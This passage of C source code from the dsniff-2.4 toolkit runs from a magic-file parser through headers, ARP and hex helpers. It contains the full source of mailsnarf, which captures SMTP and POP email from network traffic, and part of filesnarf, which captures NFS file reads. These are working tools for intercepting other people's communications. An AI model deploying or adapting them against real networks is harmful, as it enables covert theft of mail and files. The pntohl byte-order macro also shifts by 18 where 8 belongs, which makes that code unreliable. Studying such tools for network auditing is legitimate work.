8 - (m->cont_level & 7), m->offset); if (m->flag & INDIR) (void) fprintf(stderr, "(%s,%d),", (m->in.type >= 0 && m->in.type < SZOF(typ)) ? typ[(unsigned char) m->in.type] : "*bad*", m->in.offset); (void) fprintf(stderr, " %s%s", (m->flag & UNSIGNED) ? "u" : "", (m->type >= 0 && m->type < SZOF(typ)) ? typ[(unsigned char) m->type] : "*bad*"); if (m->mask != ~0) (void) fprintf(stderr, " & %.8x", m->mask); (void) fprintf(stderr, ",%c", m->reln); if (m->reln != 'x') { switch (m->type) { case BYTE: case SHORT: case LONG: case LESHORT: case LELONG: case BESHORT: case BELONG: (void) fprintf(stderr, "%d", m->value.l); break; case STRING: fprintf(stderr, "%s", m->value.s); break; case DATE: case LEDATE: case BEDATE: { char *rt, *pp = ctime((time_t*) &m->value.l); if ((rt = strchr(pp, '\n')) != NULL) *rt = '\0'; (void) fprintf(stderr, "%s,", pp); if (rt) *rt = '\n'; } break; default: (void) fputs("*bad*", stderr); break; } } (void) fprintf(stderr, ",\"%s\"]\n", m->desc); } static int magic_parse(char *p) { struct magic *m; char *t, *s; int i, j; if (Magiccnt + 1 > Magicmax) errx(1, "magic_parse: magic table full"); m = &Magic[Magiccnt]; m->flag = 0; m->cont_level = 0; while (*p == '>') { p++; /* step over */ m->cont_level++; } if (m->cont_level != 0 && *p == '(') { p++; /* step over */ m->flag |= INDIR; } if (m->cont_level != 0 && *p == '&') { p++; /* step over */ m->flag |= ADD; } /* Get offset, then skip over it. */ m->offset = (int) strtoul(p, &t, 0); if (p == t) errx(1, "magic_parse: offset %s invalid", p); p = t; if (m->flag & INDIR) { m->in.type = LONG; m->in.offset = 0; /* read [.lbs][+-]nnnnn) */ if (*p == '.') { p++; switch (LOWCASE(*p)) { case 'l': m->in.type = LONG; break; case 'h': case 's': m->in.type = SHORT; break; case 'c': case 'b': m->in.type = BYTE; break; default: errx(1, "magic_parse: indirect offset " "type '%c' invalid", *p); break; } p++; } s = p; if (*p == '+' || *p == '-') p++; if (isdigit((u_char) *p)) { m->in.offset = strtoul(p, &t, 0); if (*s == '-') m->in.offset = - m->in.offset; } else t = p; if (*t++ != ')') errx(1, "magic_parse: missing ')' in indirect offset"); p = t; } while (isascii((u_char) *p) && isdigit((u_char) *p)) p++; while (isascii((u_char) *p) && isspace((u_char) *p)) p++; if (*p == 'u') { p++; m->flag |= UNSIGNED; } /* Get type, skip it. */ t = p; for (i = 0; i < 12; i++) { j = strlen(Magictypes[i]); if (strncmp(p, Magictypes[i], j) == 0) { m->type = i + 1; p += j; break; } } if (p == t) errx(1, "magic_parse: type %s invalid", p); /* New-style and'ing: "0 byte&0x80 =0x80 dynamically linked" */ if (*p == '&') { p++; m->mask = signextend(m, strtoul(p, &p, 0)); eatsize(&p); } else m->mask = ~0L; while (isascii((u_char) *p) && isspace((u_char) *p)) p++; switch(*p) { case '>': case '<': /* Old-style and'ing: "0 byte &0x80 dynamically linked" */ case '&': case '^': case '=': m->reln = *p; p++; break; case '!': if (m->type != STRING) { m->reln = *p; p++; break; } /* FALLTHRU */ default: if (*p == 'x' && isascii((u_char) p[1]) && isspace((u_char) p[1])) { m->reln = *p; p++; goto parse_get_desc; /* Bill The Cat */ } m->reln = '='; break; } while (isascii((u_char) *p) && isspace((u_char) *p)) p++; if (getvalue(m, &p)) return (0); parse_get_desc: /* Now get last part - the description. */ while (isascii((u_char) *p) && isspace((u_char) *p)) p++; strlcpy(m->desc, p, sizeof(m->desc)); if (Opt_debug) { mdump(m); } Magiccnt++; return (1); } void magic_init(char *filename) { FILE *f; char buf[BUFSIZ]; if ((f = fopen(filename, "r")) == NULL) { err(1, "magic_init"); } memset(&Magic, 0, sizeof(Magic)); while (fgets(buf, sizeof(buf), f) != NULL) { if (buf[0] == '#') continue; if (strlen(buf) <= 1) continue; buf[strlen(buf) - 1] = '\0'; magic_parse(buf); } fclose(f); } /* Convert the byte order of the data we are looking at */ static int mconvert(union VALUETYPE *p, struct magic *m) { switch (m->type) { case BYTE: case SHORT: case LONG: case DATE: return (1); case STRING: { char *ptr; /* Null terminate and eat the return */ p->s[sizeof(p->s) - 1] = '\0'; if ((ptr = strchr(p->s, '\n')) != NULL) *ptr = '\0'; return (1); } case BESHORT: p->h = (short)((p->hs[0]<<8)|(p->hs[1])); return (1); case BELONG: case BEDATE: p->l = (int32_t)((p->hl[0]<<24)|(p->hl[1]<<16)| (p->hl[2]<<8)|(p->hl[3])); return (1); case LESHORT: p->h = (short)((p->hs[1]<<8)|(p->hs[0])); return (1); case LELONG: case LEDATE: p->l = (int32_t)((p->hl[3]<<24)|(p->hl[2]<<16)| (p->hl[1]<<8)|(p->hl[0])); return (1); default: errx(1, "mconvert: invalid type %d", m->type); } return (0); } static int mget(union VALUETYPE* p, u_char *s, struct magic *m, int nbytes) { int32_t offset = m->offset; if (offset + sizeof(union VALUETYPE) <= nbytes) memcpy(p, s + offset, sizeof(*p)); else { /* * the usefulness of padding with zeroes eludes me, it * might even cause problems */ int32_t have = nbytes - offset; memset(p, 0, sizeof(*p)); if (have > 0) memcpy(p, s + offset, have); } if (!mconvert(p, m)) return (0); if (m->flag & INDIR) { switch (m->in.type) { case BYTE: offset = p->b + m->in.offset; break; case SHORT: offset = p->h + m->in.offset; break; case LONG: offset = p->l + m->in.offset; break; } if (offset + sizeof(*p) > nbytes) return (0); memcpy(p, s + offset, sizeof(*p)); if (!mconvert(p, m)) return (0); } return (1); } static int mcheck(union VALUETYPE* p, struct magic *m) { register u_int32_t l = m->value.l; register u_int32_t v = 0; int matched; if ( (m->value.s[0] == 'x') && (m->value.s[1] == '\0') ) { warnx("mcheck: BOINK"); return (1); } switch (m->type) { case BYTE: v = p->b; break; case SHORT: case BESHORT: case LESHORT: v = p->h; break; case LONG: case BELONG: case LELONG: case DATE: case BEDATE: case LEDATE: v = p->l; break; case STRING: l = 0; /* What we want here is: * v = strncmp(m->value.s, p->s, m->vallen); * but ignoring any nulls. bcmp doesn't give -/+/0 * and isn't universally available anyway. */ v = 0; { register u_char *a = (u_char *) m->value.s; register u_char *b = (u_char *) p->s; register int len = m->vallen; while (--len >= 0) if ((v = *b++ - *a++) != '\0') break; } break; default: errx(1, "mcheck: invalid type %d", m->type); /* NOTREACHED */ } v = signextend(m, v) & m->mask; switch (m->reln) { case 'x': matched = 1; break; case '!': matched = v != l; break; case '=': matched = v == l; break; case '>': if (m->flag & UNSIGNED) { matched = v > l; } else matched = (int32_t) v > (int32_t) l; break; case '<': if (m->flag & UNSIGNED) { matched = v < l; } else matched = (int32_t) v < (int32_t) l; break; case '&': matched = (v & l) == l; break; case '^': matched = (v & l) != l; break; default: matched = 0; errx(1, "mcheck: can't happen: invalid relation %d", m->reln); /* NOTREACHED */ } if (matched && Opt_debug) mdump(m); return (matched); } static int32_t mprint(union VALUETYPE *p, struct magic *m) { int32_t t = 0; switch (m->type) { case BYTE: t = m->offset + sizeof(char); break; case SHORT: case BESHORT: case LESHORT: t = m->offset + sizeof(short); break; case LONG: case BELONG: case LELONG: t = m->offset + sizeof(int32_t); break; case STRING: if (m->reln == '=') { t = m->offset + strlen(m->value.s); } else { if (*m->value.s == '\0') { char *cp = strchr(p->s,'\n'); if (cp) *cp = '\0'; } t = m->offset + strlen(p->s); } break; case DATE: case BEDATE: case LEDATE: t = m->offset + sizeof(time_t); break; default: errx(1, "mprint: invalid m->type (%d)", m->type); } strncpy(Match, m->desc, sizeof(Match)); return (t); } /* * Go through the whole list, stopping if you find a match. Process all * the continuations of that match before returning. * * We support multi-level continuations: * * At any time when processing a successful top-level match, there is a * current continuation level; it represents the level of the last * successfully matched continuation. * * Continuations above that level are skipped as, if we see one, it * means that the continuation that controls them - i.e, the * lower-level continuation preceding them - failed to match. * * Continuations below that level are processed as, if we see one, * it means we've finished processing or skipping higher-level * continuations under the control of a successful or unsuccessful * lower-level continuation, and are now seeing the next lower-level * continuation and should process it. The current continuation * level reverts to the level of the one we're seeing. * * Continuations at the current level are processed as, if we see * one, there's no lower-level continuation that may have failed. * * If a continuation matches, we bump the current continuation level * so that higher-level continuations are processed. */ char * magic_match(u_char *s, int len) { int i, cont_level = 0; union VALUETYPE p; static int32_t *tmpoff = NULL; static size_t tmplen = 0; int32_t oldoff = 0; Match[0] = '\0'; if (tmpoff == NULL) if ((tmpoff = (int32_t *) malloc(tmplen = 20)) == NULL) err(1, "malloc"); for (i = 0; i < Magiccnt; i++) { /* if main entry matches, print it... */ if (!mget(&p, s, &Magic[i], len) || !mcheck(&p, &Magic[i])) { /* * main entry didn't match, * flush its continuations */ while (i < Magiccnt && Magic[i + 1].cont_level != 0) i++; continue; } tmpoff[cont_level] = mprint(&p, &Magic[i]); /* and any continuations that match */ if (++cont_level >= tmplen) { tmplen += 20; if (!(tmpoff = (int32_t *) realloc(tmpoff, tmplen))) err(1, "magic_match: malloc"); } while (Magic[i + 1].cont_level != 0 && ++i < Magiccnt) { if (cont_level >= Magic[i].cont_level) { if (cont_level > Magic[i].cont_level) { /* * We're at the end of the level * "cont_level" continuations. */ cont_level = Magic[i].cont_level; } if (Magic[i].flag & ADD) { oldoff = Magic[i].offset; Magic[i].offset += tmpoff[cont_level - 1]; } if (mget(&p, s, &Magic[i], len) && mcheck(&p, &Magic[i])) { /* This continuation matched. */ tmpoff[cont_level] = mprint(&p, &Magic[i]); /* * If we see any continuations * at a higher level, process them. */ if (++cont_level >= tmplen) { tmplen += 20; if (!(tmpoff = (int32_t *) realloc(tmpoff, tmplen))) err(1, "magic_check: " "malloc"); } } if (Magic[i].flag & ADD) { Magic[i].offset = oldoff; } } } return (strlen(Match) ? Match : NULL); /* all through */ } return (NULL); /* no match at all */ } dsniff-2.4/asn1.h0000600000175000017500000000051007254077101013500 0ustar lucianoluciano/* * asn1.h * * ASN.1 routines. * * Copyright (c) 2000 Dug Song * * $Id: asn1.h,v 1.3 2001/03/15 08:33:05 dugsong Exp $ */ #ifndef ASN1_H #define ASN1_H #define ASN1_INTEGER 2 #define ASN1_STRING 4 #define ASN1_SEQUENCE 16 int asn1_type(buf_t buf); int asn1_len(buf_t buf); #endif /* ASN1_H */ dsniff-2.4/base64.h0000600000175000017500000000032407254077101013725 0ustar lucianoluciano/* * base64.h * * Base-64 routines. * * $Id: base64.h,v 1.2 2001/03/15 08:33:05 dugsong Exp $ */ #ifndef BASE64_H #define BASE64_H int base64_pton(char const *, u_char *, size_t); #endif /* BASE64_H */ dsniff-2.4/decode.h0000600000175000017500000000655107254077102014075 0ustar lucianoluciano/* * decode.h * * Protocol decoding routines. * * Copyright (c) 2000 Dug Song * * $Id: decode.h,v 1.5 2001/03/15 08:33:06 dugsong Exp $ */ #ifndef DECODE_H #define DECODE_H typedef int (*decode_func)(u_char *, int, u_char *, int); struct decode { char *dc_name; decode_func dc_func; }; struct decode *getdecodebyname(const char *name); #define pletohs(p) ((u_short) \ ((u_short)*((u_char *)p+1)<<8| \ (u_short)*((u_char *)p+0)<<0)) #define pletohl(p) ((u_int32_t)*((u_char *)p+3)<<24| \ (u_int32_t)*((u_char *)p+2)<<16| \ (u_int32_t)*((u_char *)p+1)<<8| \ (u_int32_t)*((u_char *)p+0)<<0) #define pntohs(p) ((u_short) \ ((u_short)*((u_char *)p+1)<<0| \ (u_short)*((u_char *)p+0)<<8)) #define pntohl(p) ((u_int32_t)*((u_char *)p+3)<<0| \ (u_int32_t)*((u_char *)p+2)<<18| \ (u_int32_t)*((u_char *)p+1)<<16| \ (u_int32_t)*((u_char *)p+0)<<24) int strip_telopts(u_char *buf, int len); int strip_lines(char *buf, int max_lines); int is_ascii_string(char *buf, int len); u_char *bufbuf(u_char *big, int blen, u_char *little, int llen); int decode_aim(u_char *buf, int len, u_char *obuf, int olen); int decode_citrix(u_char *buf, int len, u_char *obuf, int olen); int decode_cvs(u_char *buf, int len, u_char *obuf, int olen); int decode_ftp(u_char *buf, int len, u_char *obuf, int olen); int decode_hex(u_char *buf, int len, u_char *obuf, int olen); int decode_http(u_char *buf, int len, u_char *obuf, int olen); int decode_icq(u_char *buf, int len, u_char *obuf, int olen); int decode_imap(u_char *buf, int len, u_char *obuf, int olen); int decode_irc(u_char *buf, int len, u_char *obuf, int olen); int decode_ldap(u_char *buf, int len, u_char *obuf, int olen); int decode_mmxp(u_char *buf, int len, u_char *obuf, int olen); int decode_mountd(u_char *buf, int len, u_char *obuf, int olen); int decode_napster(u_char *buf, int len, u_char *obuf, int olen); int decode_nntp(u_char *buf, int len, u_char *obuf, int olen); int decode_oracle(u_char *buf, int len, u_char *obuf, int olen); int decode_ospf(u_char *buf, int len, u_char *obuf, int olen); int decode_pcanywhere(u_char *buf, int len, u_char *obuf, int olen); int decode_pop(u_char *buf, int len, u_char *obuf, int olen); int decode_poppass(u_char *buf, int len, u_char *obuf, int olen); int decode_portmap(u_char *buf, int len, u_char *obuf, int olen); int decode_postgresql(u_char *buf, int len, u_char *obuf, int olen); int decode_pptp(u_char *buf, int len, u_char *obuf, int olen); int decode_rip(u_char *buf, int len, u_char *obuf, int olen); int decode_rlogin(u_char *buf, int len, u_char *obuf, int olen); int decode_smb(u_char *buf, int len, u_char *obuf, int olen); int decode_smtp(u_char *buf, int len, u_char *obuf, int olen); int decode_sniffer(u_char *buf, int len, u_char *obuf, int olen); int decode_snmp(u_char *buf, int len, u_char *obuf, int olen); int decode_socks(u_char *buf, int len, u_char *obuf, int olen); int decode_tds(u_char *buf, int len, u_char *obuf, int olen); int decode_telnet(u_char *buf, int len, u_char *obuf, int olen); int decode_vrrp(u_char *buf, int len, u_char *obuf, int olen); int decode_x11(u_char *buf, int len, u_char *obuf, int olen); int decode_yppasswd(u_char *buf, int len, u_char *obuf, int olen); int decode_ypserv(u_char *buf, int len, u_char *obuf, int olen); #endif /* DECODE_H */ dsniff-2.4/options.h0000600000175000017500000000062107254077102014335 0ustar lucianoluciano/* * options.h * * Global options. * * Copyright (c) 2000 Dug Song * * $Id: options.h,v 1.4 2001/03/15 08:33:06 dugsong Exp $ */ #ifndef OPTIONS_H #define OPTIONS_H extern int Opt_client; extern u_short Opt_dns; extern int Opt_debug; extern int Opt_magic; extern int Opt_read; extern int Opt_write; extern int Opt_snaplen; extern int Opt_lines; #endif /* OPTIONS_H */ dsniff-2.4/record.h0000600000175000017500000000065007254077102014122 0ustar lucianoluciano/* * record.h * * Record interface. * * Copyright (c) 2000 Dug Song * * $Id: record.h,v 1.3 2001/03/15 08:33:06 dugsong Exp $ */ #ifndef RECORD_H #define RECORD_H int record_init(char *file); int record(u_int32_t src, u_int32_t dst, int proto, u_short sport, u_short dport, char *name, u_char *buf, int len); void record_dump(void); void record_close(void); #endif /* RECORD_H */ dsniff-2.4/rpc.h0000600000175000017500000000112307254077102013424 0ustar lucianoluciano/* * rpc.h * * RPC utility routines. * * Copyright (c) 2000 Dug Song * * $Id: rpc.h,v 1.4 2001/03/15 08:33:06 dugsong Exp $ */ #ifndef RPC_H #define RPC_H #define FRAGLEN(x) (x & 0x7fffffff) #define LASTFRAG(x) (x & (1 << 31)) struct xid_map { u_int32_t xid; u_int32_t prog; u_int32_t vers; u_int32_t proc; void *data; }; int rpc_decode(u_char *buf, int len, struct rpc_msg *msg); void xid_map_enter(u_int32_t xid, u_int32_t prog, u_int32_t vers, u_int32_t proc, void *data); struct xid_map *xid_map_find(int xid); #endif /* RPC_H */ dsniff-2.4/trigger.h0000600000175000017500000000155107254077102014310 0ustar lucianoluciano/* * trigger.h * * Trigger interface. * * Copyright (c) 2000 Dug Song * * $Id: trigger.h,v 1.5 2001/03/15 08:33:06 dugsong Exp $ */ #ifndef TRIGGER_H #define TRIGGER_H #define TRIGGER_TCP_RAW_TIMEOUT 30 void trigger_init_list(char *list); void trigger_init_magic(char *filename); void trigger_init_services(char *filename); void trigger_dump(void); int trigger_set_ip(int proto, char *name); int trigger_set_udp(int port, char *name); int trigger_set_tcp(int port, char *name); int trigger_set_rpc(int program, char *name); void trigger_ip(struct libnet_ip_hdr *ip); void trigger_udp(struct libnet_ip_hdr *ip); void trigger_tcp(struct tcp_stream *ts, void **conn_save); void trigger_tcp_raw(struct libnet_ip_hdr *ip); void trigger_tcp_raw_timeout(int signal); void trigger_rpc(int program, int proto, int port); #endif /* TRIGGER_H */ dsniff-2.4/arp.c0000600000175000017500000000442607254077072013434 0ustar lucianoluciano/* * arp.c * * ARP cache routines. * * Copyright (c) 1999 Dug Song * * $Id: arp.c,v 1.8 2001/03/15 08:32:58 dugsong Exp $ */ #include "config.h" #include #include #include #ifdef BSD #include #include #include #ifdef __FreeBSD__ /* XXX */ #define ether_addr_octet octet #endif #else /* !BSD */ #include #ifndef __linux__ #include #endif #endif /* !BSD */ #include #include #include #include #include #include #include #include "arp.h" #ifdef BSD int arp_cache_lookup(in_addr_t ip, struct ether_addr *ether) { int mib[6]; size_t len; char *buf, *next, *end; struct rt_msghdr *rtm; struct sockaddr_inarp *sin; struct sockaddr_dl *sdl; mib[0] = CTL_NET; mib[1] = AF_ROUTE; mib[2] = 0; mib[3] = AF_INET; mib[4] = NET_RT_FLAGS; mib[5] = RTF_LLINFO; if (sysctl(mib, 6, NULL, &len, NULL, 0) < 0) return (-1); if ((buf = (char *)malloc(len)) == NULL) return (-1); if (sysctl(mib, 6, buf, &len, NULL, 0) < 0) { free(buf); return (-1); } end = buf + len; for (next = buf ; next < end ; next += rtm->rtm_msglen) { rtm = (struct rt_msghdr *)next; sin = (struct sockaddr_inarp *)(rtm + 1); sdl = (struct sockaddr_dl *)(sin + 1); if (sin->sin_addr.s_addr == ip && sdl->sdl_alen) { memcpy(ether->ether_addr_octet, LLADDR(sdl), ETHER_ADDR_LEN); free(buf); return (0); } } free(buf); return (-1); } #else /* !BSD */ #ifndef ETHER_ADDR_LEN /* XXX - Solaris */ #define ETHER_ADDR_LEN 6 #endif int arp_cache_lookup(in_addr_t ip, struct ether_addr *ether) { int sock; struct arpreq ar; struct sockaddr_in *sin; memset((char *)&ar, 0, sizeof(ar)); #ifdef __linux__ strncpy(ar.arp_dev, "eth0", sizeof(ar.arp_dev)); /* XXX - *sigh* */ #endif sin = (struct sockaddr_in *)&ar.arp_pa; sin->sin_family = AF_INET; sin->sin_addr.s_addr = ip; if ((sock = socket(AF_INET, SOCK_DGRAM, 0)) == -1) { return (-1); } if (ioctl(sock, SIOCGARP, (caddr_t)&ar) == -1) { close(sock); return (-1); } close(sock); memcpy(ether->ether_addr_octet, ar.arp_ha.sa_data, ETHER_ADDR_LEN); return (0); } #endif /* !BSD */ dsniff-2.4/hex.c0000600000175000017500000000275107254077077013442 0ustar lucianoluciano/* * hex.c * * Copyright (c) 2000 Dug Song * * $Id: hex.c,v 1.5 2001/03/15 08:33:03 dugsong Exp $ */ #include "config.h" #include #include #include #include #include "hex.h" int hex_decode(char *src, int srclen, u_char *dst, int dstlen) { char *p, *pe; u_char *q, *qe, ch, cl; pe = src + srclen; qe = dst + dstlen; if (strncmp(src, "0x", 2) == 0) src += 2; for (p = src, q = dst; p < pe && q < qe && isxdigit((int)*p); p += 2) { ch = tolower(p[0]); cl = tolower(p[1]); if ((ch >= '0') && (ch <= '9')) ch -= '0'; else if ((ch >= 'a') && (ch <= 'f')) ch -= 'a' - 10; else return (-1); if ((cl >= '0') && (cl <= '9')) cl -= '0'; else if ((cl >= 'a') && (cl <= 'f')) cl -= 'a' - 10; else return (-1); *q++ = (ch << 4) | cl; } return (q - dst); } /* adapted from OpenBSD tcpdump: dump the buffer in emacs-hexl format */ void hex_print(const u_char *buf, int len, int offset) { u_int i, j, jm; int c; printf("\n"); for (i = 0; i < len; i += 0x10) { printf(" %04x: ", (u_int)(i + offset)); jm = len - i; jm = jm > 16 ? 16 : jm; for (j = 0; j < jm; j++) { if ((j % 2) == 1) printf("%02x ", (u_int) buf[i+j]); else printf("%02x", (u_int) buf[i+j]); } for (; j < 16; j++) { if ((j % 2) == 1) printf(" "); else printf(" "); } printf(" "); for (j = 0; j < jm; j++) { c = buf[i+j]; c = isprint(c) ? c : '.'; printf("%c", c); } printf("\n"); } } dsniff-2.4/hex.h0000600000175000017500000000053007254077102013425 0ustar lucianoluciano/* * hex.h * * Hexadecimal conversion routines. * * Copyright (c) 2000 Dug Song * * $Id: hex.h,v 1.3 2001/03/15 08:33:06 dugsong Exp $ */ #ifndef HEX_H #define HEX_H int hex_decode(char *src, int srclen, u_char *buf, int len); void hex_print(const u_char *buf, int len, int offset); #endif /* HEX_H */ dsniff-2.4/mailsnarf.c0000600000175000017500000001702207254077100014612 0ustar lucianoluciano/* * mailsnarf.c * * Sniff mail on a network, saving messages in Berkeley mbox format. * * Copyright (c) 1999 Dug Song * * $Id: mailsnarf.c,v 1.38 2001/03/15 08:33:04 dugsong Exp $ */ #include "config.h" #include #include #include #include #include #include #include #include #include #include #include #include "pcaputil.h" #include "buf.h" #include "version.h" /* bogus SMTP state machine */ enum { SMTP_NONE = 0, SMTP_HELO, SMTP_MAIL, SMTP_RCPT, SMTP_DATA }; /* likewise, POP. */ enum { POP_NONE = 0, POP_RETR, POP_DATA }; struct smtp_info { int state; char *from; }; struct pop_info { int state; }; int Opt_invert = 0; regex_t *pregex = NULL; static void usage(void) { fprintf(stderr, "Version: " VERSION "\n" "Usage: mailsnarf [-i interface] [[-v] pattern [expression]]\n"); exit(1); } static int regex_match(char *string) { return (pregex == NULL || ((regexec(pregex, string, 0, NULL, 0) == 0) ^ Opt_invert)); } static char * grep_mail_address(char *buf) { char *p, *q; if ((p = strchr(buf, '<')) != NULL) { p++; if ((q = strchr(p, '>')) != NULL) *q = '\0'; if (strlen(p) > 0) return (strdup(p)); } return (NULL); } static void print_mbox_msg(char *from, char *msg) { char *p; time_t t; t = time(NULL); if (from == NULL) from = "mailsnarf"; printf("From %s %s", from, ctime(&t)); while ((p = strsep(&msg, "\n")) != NULL) { if (strncmp(p, "From ", 5) == 0) putchar('>'); for (; *p != '\r' && *p != '\0'; p++) putchar(*p); putchar('\n'); } putchar('\n'); fflush(stdout); } static int process_pop_client(struct pop_info *pop, char *data, int len) { struct buf *line, buf; int i; buf_init(&buf, data, len); while ((i = buf_index(&buf, "\r\n", 2)) >= 0) { line = buf_tok(&buf, NULL, i + 2); line->base[line->end] = '\0'; if (strncasecmp(buf_ptr(line), "RETR ", 5) == 0) { pop->state = POP_RETR; } else pop->state = POP_NONE; } return (len - buf_len(&buf)); } static int process_pop_server(struct pop_info *pop, char *data, int len) { struct buf *line, *body, buf; int i; buf_init(&buf, data, len); if (pop->state == POP_NONE) return (len); if (pop->state == POP_RETR) { if ((i = buf_index(&buf, "\r\n", 2)) < 0) return (0); line = buf_tok(&buf, NULL, i + 2); if (buf_cmp(line, "+OK", 3) == 0) { pop->state = POP_DATA; } else pop->state = POP_NONE; } if (pop->state == POP_DATA) { if ((i = buf_index(&buf, "\r\n.\r\n", 5)) >= 0) { body = buf_tok(&buf, NULL, i); buf_skip(&buf, 5); body->base[body->end] = '\0'; if (regex_match(buf_ptr(body))) print_mbox_msg(NULL, buf_ptr(body)); pop->state = POP_NONE; } } return (len - buf_len(&buf)); } static int process_smtp_client(struct smtp_info *smtp, char *data, int len) { struct buf *line, *body, buf; char *p; int i; buf_init(&buf, data, len); if (smtp->state != SMTP_DATA) { while ((i = buf_index(&buf, "\r\n", 2)) >= 0) { line = buf_tok(&buf, NULL, i + 2); line->base[line->end] = '\0'; p = buf_ptr(line); if (strncasecmp(p, "RSET", 4) == 0) { smtp->state = SMTP_HELO; } else if (smtp->state == SMTP_NONE && (strncasecmp(p, "HELO", 4) == 0 || strncasecmp(p, "EHLO", 4) == 0)) { smtp->state = SMTP_HELO; } else if (smtp->state == SMTP_HELO && (strncasecmp(p, "MAIL ", 5) == 0 || strncasecmp(p, "SEND ", 5) == 0 || strncasecmp(p, "SAML ", 5) == 0)) { smtp->from = grep_mail_address(p); smtp->state = SMTP_MAIL; } else if (smtp->state == SMTP_MAIL && strncasecmp(p, "RCPT ", 5) == 0) { smtp->state = SMTP_RCPT; } else if (smtp->state == SMTP_RCPT && strncasecmp(p, "DATA", 4) == 0) { smtp->state = SMTP_DATA; break; } } } if (smtp->state == SMTP_DATA) { if ((i = buf_index(&buf, "\r\n.\r\n", 5)) >= 0) { body = buf_tok(&buf, NULL, i); buf_skip(&buf, 5); body->base[body->end] = '\0'; if (regex_match(buf_ptr(body))) print_mbox_msg(smtp->from, buf_ptr(body)); if (smtp->from) { free(smtp->from); smtp->from = NULL; } smtp->state = SMTP_HELO; } } return (len - buf_len(&buf)); } static void sniff_pop_session(struct tcp_stream *ts, struct pop_info **pop_save) { struct pop_info *pop; int i; if (ts->addr.dest != 110 && ts->addr.source != 110 && /* POP3 */ ts->addr.dest != 109 && ts->addr.source != 109 && /* POP2 */ ts->addr.dest != 1109 && ts->addr.source != 1109) /* KPOP */ return; switch (ts->nids_state) { case NIDS_JUST_EST: ts->server.collect = 1; ts->client.collect = 1; if ((pop = (struct pop_info *) malloc(sizeof(*pop))) == NULL) nids_params.no_mem("sniff_pop_session"); pop->state = POP_NONE; *pop_save = pop; break; case NIDS_DATA: pop = *pop_save; if (ts->server.count_new > 0) { i = process_pop_client(pop, ts->server.data, ts->server.count - ts->server.offset); nids_discard(ts, i); } else if (ts->client.count_new > 0) { i = process_pop_server(pop, ts->client.data, ts->client.count - ts->client.offset); nids_discard(ts, i); } break; default: pop = *pop_save; if (ts->server.count > 0) process_pop_client(pop, ts->server.data, ts->server.count - ts->server.offset); else if (ts->client.count > 0) process_pop_server(pop, ts->client.data, ts->client.count - ts->client.offset); free(pop); break; } } /* XXX - Minimal SMTP FSM. We don't even consider server responses. */ static void sniff_smtp_client(struct tcp_stream *ts, struct smtp_info **smtp_save) { struct smtp_info *smtp; int i; if (ts->addr.dest != 25) return; switch (ts->nids_state) { case NIDS_JUST_EST: ts->server.collect = 1; if ((smtp = (struct smtp_info *)malloc(sizeof(*smtp))) == NULL) nids_params.no_mem("sniff_smtp_client"); smtp->state = SMTP_NONE; smtp->from = NULL; *smtp_save = smtp; break; case NIDS_DATA: smtp = *smtp_save; if (ts->server.count_new > 0) { i = process_smtp_client(smtp, ts->server.data, ts->server.count - ts->server.offset); nids_discard(ts, i); } break; default: smtp = *smtp_save; if (ts->server.count > 0) { process_smtp_client(smtp, ts->server.data, ts->server.count - ts->server.offset); } if (smtp->from) free(smtp->from); free(smtp); break; } } static void null_syslog(int type, int errnum, struct ip *iph, void *data) { } int main(int argc, char *argv[]) { extern char *optarg; extern int optind; int c; while ((c = getopt(argc, argv, "i:vh?V")) != -1) { switch (c) { case 'i': nids_params.device = optarg; break; case 'v': Opt_invert = 1; break; default: usage(); } } argc -= optind; argv += optind; if (argc > 0 && strlen(argv[0])) { if ((pregex = (regex_t *) malloc(sizeof(*pregex))) == NULL) err(1, "malloc"); if (regcomp(pregex, argv[0], REG_EXTENDED|REG_NOSUB) != 0) errx(1, "invalid regular expression"); } if (argc > 1) nids_params.pcap_filter = copy_argv(argv + 1); nids_params.scan_num_hosts = 0; nids_params.syslog = null_syslog; if (!nids_init()) errx(1, "%s", nids_errbuf); nids_register_tcp(sniff_smtp_client); nids_register_tcp(sniff_pop_session); if (nids_params.pcap_filter != NULL) { warnx("listening on %s [%s]", nids_params.device, nids_params.pcap_filter); } else warnx("listening on %s", nids_params.device); nids_run(); /* NOTREACHED */ exit(0); } dsniff-2.4/filesnarf.c0000600000175000017500000002406707254077077014633 0ustar lucianoluciano/* * filesnarf.c * * Sniff files from NFS traffic. * * Copyright (c) 2000 Dug Song * * $Id: filesnarf.c,v 1.13 2001/03/15 08:33:03 dugsong Exp $ */ #include "config.h" #include #include #include #include #include #include #include #include #include #include #include #include "decode.h" #include "pcaputil.h" #include "nfs_prot.h" #include "rpc.h" #include "version.h" struct myreadargs { char *filename; u_int offset; }; struct fh_map { u_char fh[NFS3_FHSIZE]; char *filename; }; #define FH_MAP_SIZE 128 struct fh_map fh_maps[FH_MAP_SIZE]; int fh_map_next = 0; int fh_map_hint = 0; int Opt_invert = 0; regex_t *pregex = NULL; static void usage(void) { fprintf(stderr, "Version: " VERSION "\n" "Usage: filesnarf [-i interface] [[-v] pattern [expression]]\n"); exit(1); } /* XXX - for nfs_prot_xdr.c */ bool_t xdr_u_int64_t(XDR *xdrs, u_int64_t *nump) { int i = 1; u_char *p = (u_char *)nump; if (*(char *)&i == 1) { /* endian haack. */ if (xdr_u_long(xdrs, (u_long *)(p + 4))) return (xdr_u_long(xdrs, (u_long *)p)); } else { if (xdr_u_long(xdrs, (u_long *)p)) return (xdr_u_long(xdrs, (u_long *)(p + 4))); } return (FALSE); } bool_t xdr_int64_t(XDR *xdrs, int64_t *nump) { return (xdr_u_int64_t(xdrs, (u_int64_t *)nump)); } static void fh_map_init(void) { memset(&fh_maps, 0, sizeof(fh_maps)); } static void fh_map_add(char *filename, u_char *fh, int len) { struct fh_map *fm; fm = &fh_maps[fh_map_next]; if (++fh_map_next > FH_MAP_SIZE) fh_map_next = 0; memcpy(fm->fh, fh, len); if ((fm->filename = strdup(filename)) == NULL) err(1, "fh_map_add: malloc"); } static char * fh_map_find(u_char *fh, int len) { struct fh_map *fm; int i; i = fh_map_hint; do { fm = &fh_maps[i]; if (memcmp(fm->fh, fh, len) == 0) { fh_map_hint = i; return (fm->filename); } if (++i > FH_MAP_SIZE) i = 0; } while (i != fh_map_hint); return (NULL); } static int regex_match(char *string) { return (pregex == NULL || ((regexec(pregex, string, 0, NULL, 0) == 0) ^ Opt_invert)); } static void nfs_save(struct tuple4 *addr, struct myreadargs *ma, u_char *buf, int len) { int fd; warnx("%s.%d > %s.%d: %s (%d@%d)", libnet_host_lookup(addr->daddr, 0), addr->dest, libnet_host_lookup(addr->saddr, 0), addr->source, ma->filename, len, ma->offset); if 